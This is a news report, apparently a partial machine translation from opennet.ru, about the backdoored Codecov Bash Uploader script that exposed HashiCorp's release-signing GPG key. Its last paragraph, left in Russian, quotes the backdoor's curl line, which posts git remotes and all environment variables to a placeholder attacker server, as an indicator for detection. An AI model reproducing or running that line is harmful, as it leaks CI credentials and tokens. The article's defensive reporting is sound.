Pahaloomulise koodi lisamine Codecovi skripti viis HashiCorpi PGP-võtme kompromiteerimiseni

HashiCorpi ettevõte, mis on tuntud avatud tööriistade, nagu Vagrant, Packer, Nomad ja Terraform, arendamise poolest, teatas suletud GPG-võtme lekkimisest, mida kasutati digitaalsete allkirjade loomisel, mis kinnitavad väljaandeid. Ründajad, kes said juurde pääseda GPG-võtmele, oleksid potentsiaalselt võinud teha varjatud muudatusi HashiCorpi toodetes, kinnitades neid korrektse digitaalse allkirjaga. Ettevõte teatas, et korraldatud auditi käigus ei leitud mingeid märke selliste muudatuste tegemise katsetest.

Praegu on kompromiteeritud GPG-võti tühistatud ning selle asemel on kasutusele võetud uus võti. Probleem mõjutab ainult SHA256SUM ja SHA256SUM.sig failide kontrollimist ning ei mõjuta digitaalsete allkirjade loomist Linuxi DEB ja RPM pakettide jaoks, mis on saadaval aadressil releases.hashicorp.com, ega ka macOS-i ja Windowsi (AuthentiCode) väljaannete kinnitamise mehhanisme.

Kahjustus tekkis, kuna Codecov Bash Uploader (codecov-bash) kasutati infrastruktuuris, et laadida üles katvustaruandeid pideva integreerimise süsteemidest. Codecov'i vastu toimunud rünnaku käigus peidetud bäkdoor selle skripti sisse võimaldas paroolide ja šifreerimisvõtmete saatmise. server kurjategijatele.

Rünnakute sooritamiseks kasutasid kurjategijad viga Codecov'i Docker-pildi loomise protsessis, mis võimaldas pääseda juurde GCS (Google Cloud Storage) andmetele, mis olid vajalikud Bash Uploader skripti muutmiseks, mis levis kodulehelt codecov.io. Muudatused tehti juba 31. jaanuaril ja kaks kuud jäid tähelepanuta, võimaldades kurjategijatel koguda teavet, mis oli salvestatud klientide pideva integreerimise süsteemides. Lisatud pahavara kaudu said kurjategijad teada testitava Git-repositoriumi ja kõigi keskkonna muutujate andmed, sealhulgas ka tokene, šifreerimisvõtmed ja paroolid, mis edastati pideva integreerimise süsteemidesse rakenduskoodide, ladustamis- ja teenuste, näiteks Amazon Web Services ja GitHub, juurde pääsemiseks.

Кроме прямого вызова скрипт Codecov Bash Uploader использовался в составе других загрузчиков, таких как Codecov-action (Github), Codecov-circleci-orb и Codecov-bitrise-step, пользователи которых также подвержены проблеме. Всем пользователям codecov-bash и связанных с ним продуктов рекомендовано провести аудит своих инфраструктур, а также же поменять пароли и ключи шифрования. Проверить наличие бэкдора в скрипте можно по наличию в нём строки curl -sm 0.5 -d «$(git remote -v)<<<<<< ENV $(env)» http://<IP-сервера-атакующих>/upload/v2 || true

Allikas: opennet.ru

Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid 🔥 Osta usaldusväärne veebihosting DDoS kaitsega, VPS VDS serverid | ProHoster